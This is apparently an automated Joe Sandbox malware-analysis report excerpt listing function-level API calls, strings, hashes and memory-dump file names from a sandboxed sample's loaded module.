                                            • Opcode Fuzzy Hash: 89ebee2b0a5f53b6d6da1bca9cdf927446d2dc54bc202d1fcff96b8e61b2a5d5
                                            • Instruction Fuzzy Hash: 3CD15B71E00249CFDB04DFA8C884AADBBB9FF48318FA48159E515AB354D731EA46CF91
                                            APIs
                                            • __CxxThrowException@8.LIBCMT ref: 689816B2
                                              • Part of subcall function 689AAC75: RaiseException.KERNEL32(?,?,689A9C34,513F6A41,?,?,?,?,689A9C34,513F6A41,689D9C90,689EB974,513F6A41), ref: 689AACB7
                                            • __CxxThrowException@8.LIBCMT ref: 6898180A
                                              • Part of subcall function 68944010: std::_Xinvalid_argument.LIBCPMT ref: 6894402A
                                            Strings
                                            • : this key is too short to encrypt any messages, xrefs: 6898162A
                                            • exceeds the maximum of , xrefs: 6898173F
                                            • for this public key, xrefs: 68981771
                                            • : message length of , xrefs: 6898170D
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Exception@8Throw$ExceptionRaiseXinvalid_argumentstd::_
                                            • String ID: exceeds the maximum of $ for this public key$: message length of $: this key is too short to encrypt any messages
                                            • API String ID: 3807434085-412673420
                                            • Opcode ID: 61bf84b50bc224d0a0722c51f9d5b173fc22229ac5bbd8f9d2681b099a34a424
                                            • Instruction ID: 14f38034a51b7a8f585cad5b0d7aefda956896c06985825281f90a489dbe0914
                                            • Opcode Fuzzy Hash: 61bf84b50bc224d0a0722c51f9d5b173fc22229ac5bbd8f9d2681b099a34a424
                                            • Instruction Fuzzy Hash: F2B14C756083809FD320DB69C890FABB7E9AFDA304F44891DE59D83251DB71E905CBA3
                                            APIs
                                            • SafeArrayGetElement.OLEAUT32(?,?,Aj?Q), ref: 68963C49
                                            • VariantInit.OLEAUT32(?), ref: 68963C81
                                            • VariantClear.OLEAUT32(?), ref: 68963D26
                                            • VariantClear.OLEAUT32(?), ref: 68963D30
                                            • VariantClear.OLEAUT32(?), ref: 68963D89
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Variant$Clear$ArrayElementInitSafe
                                            • String ID: Aj?Q
                                            • API String ID: 4110538090-52356588
                                            • Opcode ID: a16fe5e76e99a0ed0eaf2bbeb6ee05f727a609b87be1593e94c6b5b8e5e41898
                                            • Instruction ID: 88625647f3599ae340567c534b090bf8acfd66ed5edb2721daf07c9021f9cf9f
                                            • Opcode Fuzzy Hash: a16fe5e76e99a0ed0eaf2bbeb6ee05f727a609b87be1593e94c6b5b8e5e41898
                                            • Instruction Fuzzy Hash: C161AC76A00209DFDB00DFA8C8849AEBBB9FF49324F648599E515AB350C731ED45DBA0
                                            APIs
                                              • Part of subcall function 68944010: std::_Xinvalid_argument.LIBCPMT ref: 6894402A
                                            • __CxxThrowException@8.LIBCMT ref: 68976BA6
                                              • Part of subcall function 689AAC75: RaiseException.KERNEL32(?,?,689A9C34,513F6A41,?,?,?,?,689A9C34,513F6A41,689D9C90,689EB974,513F6A41), ref: 689AACB7
                                              • Part of subcall function 68944010: std::_Xinvalid_argument.LIBCPMT ref: 68944067
                                              • Part of subcall function 68944010: _memmove.LIBCMT ref: 689440C8
                                            • __CxxThrowException@8.LIBCMT ref: 68976C56
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
                                            • String ID: Aj?Q$NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes$RandomNumberGenerator: IncorporateEntropy not implemented$\Aj?Q
                                            • API String ID: 1902190269-59407295
                                            • Opcode ID: ad9f131795180a8880418529f6ff137c377cb3beb09e42ba322fdad7e71818dd
                                            • Instruction ID: d45dd8905fc7fc9aa9860461c1f3e300367dab9c4ae74d1244a0c8845c0c4e35
                                            • Opcode Fuzzy Hash: ad9f131795180a8880418529f6ff137c377cb3beb09e42ba322fdad7e71818dd
                                            • Instruction Fuzzy Hash: 15514675208380AFC310CF29C880A5BFBF8BF9A754F804A2EF5A593290D775D908CB52
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 689A126E
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A90ED
                                              • Part of subcall function 689A90D8: __CxxThrowException@8.LIBCMT ref: 689A9102
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A9113
                                            • _memmove.LIBCMT ref: 689A12E0
                                            • _memmove.LIBCMT ref: 689A1305
                                            • _memmove.LIBCMT ref: 689A1342
                                            • _memmove.LIBCMT ref: 689A135F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                            • String ID: deque<T> too long
                                            • API String ID: 4034224661-309773918
                                            • Opcode ID: 678a71cff7f7c2829ecbb8672fe55d51e5ed4cc0431993fd99d1b4009e51b884
                                            • Instruction ID: ac7a88e0947789e42543dd0cef25a83d61be238cdac726a319538df9ad31a907
                                            • Opcode Fuzzy Hash: 678a71cff7f7c2829ecbb8672fe55d51e5ed4cc0431993fd99d1b4009e51b884
                                            • Instruction Fuzzy Hash: 30410376A042018BD704CE28CC81A7BB7EAEFD4214F49862DE81AD7344FA34ED05C7A2
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 689A13BE
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A90ED
                                              • Part of subcall function 689A90D8: __CxxThrowException@8.LIBCMT ref: 689A9102
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A9113
                                            • _memmove.LIBCMT ref: 689A1431
                                            • _memmove.LIBCMT ref: 689A1456
                                            • _memmove.LIBCMT ref: 689A1493
                                            • _memmove.LIBCMT ref: 689A14B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                            • String ID: deque<T> too long
                                            • API String ID: 4034224661-309773918
                                            • Opcode ID: a4d87485b081fb0f7bf5c9ff25f7aba565676a24675885c96bd5cf14250a3a3a
                                            • Instruction ID: 61884db27245c773cd5b3be3b4ac3898ca55cdc87e28462069acf5348972dcdd
                                            • Opcode Fuzzy Hash: a4d87485b081fb0f7bf5c9ff25f7aba565676a24675885c96bd5cf14250a3a3a
                                            • Instruction Fuzzy Hash: 14411476A042048BC704CE28DC81A6BB7EAEFD4614F49862CE81AD7344FA34ED05C7A2
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 68944DA9
                                              • Part of subcall function 689A9125: std::exception::exception.LIBCMT ref: 689A913A
                                              • Part of subcall function 689A9125: __CxxThrowException@8.LIBCMT ref: 689A914F
                                              • Part of subcall function 689A9125: std::exception::exception.LIBCMT ref: 689A9160
                                            • std::_Xinvalid_argument.LIBCPMT ref: 68944DCA
                                            • std::_Xinvalid_argument.LIBCPMT ref: 68944DE5
                                            • _memmove.LIBCMT ref: 68944E4D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                            • String ID: invalid string position$string too long
                                            • API String ID: 443534600-4289949731
                                            • Opcode ID: ef2cfbbedda5afcd4cfb5f27b42d1e22a9268fb4c923356307c861ed6ee4469c
                                            • Instruction ID: 3e4d1dd017e5a1e7dc178b1fa3999ab364e69b547c0b7fcba93c529325e53f76
                                            • Opcode Fuzzy Hash: ef2cfbbedda5afcd4cfb5f27b42d1e22a9268fb4c923356307c861ed6ee4469c
                                            • Instruction Fuzzy Hash: F331C8327052118FD7348E5CE890A7BF3E9EB90768B90062EE562CB641D772D8828B91
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Name::operator+$NameName::
                                            • String ID: throw(
                                            • API String ID: 168861036-3159766648
                                            • Opcode ID: 2c0beca88381d7384a2e894190ef229086b804c561efcbbb92fac966bdcf82b1
                                            • Instruction ID: aa6c4d89dd0bb318fbed8520b30edb23b13b276e687379f4ccf578be50817357
                                            • Opcode Fuzzy Hash: 2c0beca88381d7384a2e894190ef229086b804c561efcbbb92fac966bdcf82b1
                                            • Instruction Fuzzy Hash: 3A014074600109AFCF14DFA4C855DFF7BB9AB94708F804165E5069B294DBB0D9469B90
                                            APIs
                                            • __getptd_noexit.LIBCMT ref: 689ACCFA
                                              • Part of subcall function 689AEA6D: GetLastError.KERNEL32(?,?,689AD7DD,689A9DEF,00000000,?,689A9BD4,68941290,513F6A41), ref: 689AEA71
                                              • Part of subcall function 689AEA6D: ___set_flsgetvalue.LIBCMT ref: 689AEA7F
                                              • Part of subcall function 689AEA6D: __calloc_crt.LIBCMT ref: 689AEA93
                                              • Part of subcall function 689AEA6D: DecodePointer.KERNEL32(00000000,?,?,689AD7DD,689A9DEF,00000000,?,689A9BD4,68941290,513F6A41), ref: 689AEAAD
                                              • Part of subcall function 689AEA6D: GetCurrentThreadId.KERNEL32 ref: 689AEAC3
                                              • Part of subcall function 689AEA6D: SetLastError.KERNEL32(00000000,?,?,689AD7DD,689A9DEF,00000000,?,689A9BD4,68941290,513F6A41), ref: 689AEADB
                                            • __calloc_crt.LIBCMT ref: 689ACD1C
                                            • __get_sys_err_msg.LIBCMT ref: 689ACD3A
                                            • _strcpy_s.LIBCMT ref: 689ACD42
                                            • __invoke_watson.LIBCMT ref: 689ACD57
                                            Strings
                                            • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 689ACD07, 689ACD2A
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
                                            • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                            • API String ID: 3117964792-798102604
                                            • Opcode ID: 193b49e636b4cc28f9c377165ba36af447d8284ca1ab61fcef3063d2f7364856
                                            • Instruction ID: 7b6c17b7b69a98a27cdb74569e5bb40751f94fef164dda41acb38283f4b01734
                                            • Opcode Fuzzy Hash: 193b49e636b4cc28f9c377165ba36af447d8284ca1ab61fcef3063d2f7364856
                                            • Instruction Fuzzy Hash: 2CF0597760832867C73026296CC096F7EBCDB9176CBC1083AF9289FA00EB26DC004196
                                            APIs
                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,689D9880,00000008,689AEAC1,00000000,00000000,?,?,689AD7DD,689A9DEF,00000000,?,689A9BD4,68941290,513F6A41), ref: 689AE9CA
                                            • __lock.LIBCMT ref: 689AE9FE
                                              • Part of subcall function 689B2438: __mtinitlocknum.LIBCMT ref: 689B244E
                                              • Part of subcall function 689B2438: __amsg_exit.LIBCMT ref: 689B245A
                                              • Part of subcall function 689B2438: EnterCriticalSection.KERNEL32(689A9BD4,689A9BD4,?,689AEA03,0000000D), ref: 689B2462
                                            • InterlockedIncrement.KERNEL32(FFFFFEF5), ref: 689AEA0B
                                            • __lock.LIBCMT ref: 689AEA1F
                                            • ___addlocaleref.LIBCMT ref: 689AEA3D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                            • String ID: KERNEL32.DLL
                                            • API String ID: 637971194-2576044830
                                            • Opcode ID: 94eec542b4e4719e544bd378a1b2a602adad2cc023a8ed34922b76142e7e4555
                                            • Instruction ID: 494ddb8ed37d68318e2e9cf216ba72623b7898570167c3684e7806b0a061fef4
                                            • Opcode Fuzzy Hash: 94eec542b4e4719e544bd378a1b2a602adad2cc023a8ed34922b76142e7e4555
                                            • Instruction Fuzzy Hash: EC015B75445B009ED720DF69C40575DFBE0EF61329FA08909D496966A0CB71E640CB12
                                            APIs
                                            • SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6895E29B
                                            • SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6895E2B6
                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6895E2D7
                                              • Part of subcall function 68965760: std::tr1::_Xweak.LIBCPMT ref: 68965769
                                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6895E309
                                              • Part of subcall function 689A9BB5: _malloc.LIBCMT ref: 689A9BCF
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 6895E523
                                            • InterlockedCompareExchange.KERNEL32(689EC6A4,45524548,4B4F4F4C), ref: 6895E544
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
                                            • String ID:
                                            • API String ID: 2722669376-0
                                            • Opcode ID: 097fe866d7d07314113b82de31bbc6ea3618e83628c84789be9c0cc1230ba80c
                                            • Instruction ID: 8dad1d4b6df07205834da00a786b6ed9da9ca503f915eb686ef867cb840623db
                                            • Opcode Fuzzy Hash: 097fe866d7d07314113b82de31bbc6ea3618e83628c84789be9c0cc1230ba80c
                                            • Instruction Fuzzy Hash: F5D1D7B5A002049FDF10CFA4C884BAF77B8FF55308F944469E956AB281D776ED50CBA2
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEBF
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 5a269c5c84819cce5cb9f14562ba6e48c07a254351d20a99b8e432003d26c3f7
                                            • Instruction ID: 0d5e686374b8360106078b02a2ff2884801186c1eb7bc3f326a86e2814eae6d9
                                            • Opcode Fuzzy Hash: 5a269c5c84819cce5cb9f14562ba6e48c07a254351d20a99b8e432003d26c3f7
                                            • Instruction Fuzzy Hash: 3B412B74E016189FDB00DFA9C980A5EB7FDAF89314F60858AE919EB355DB31E881CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEBF
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
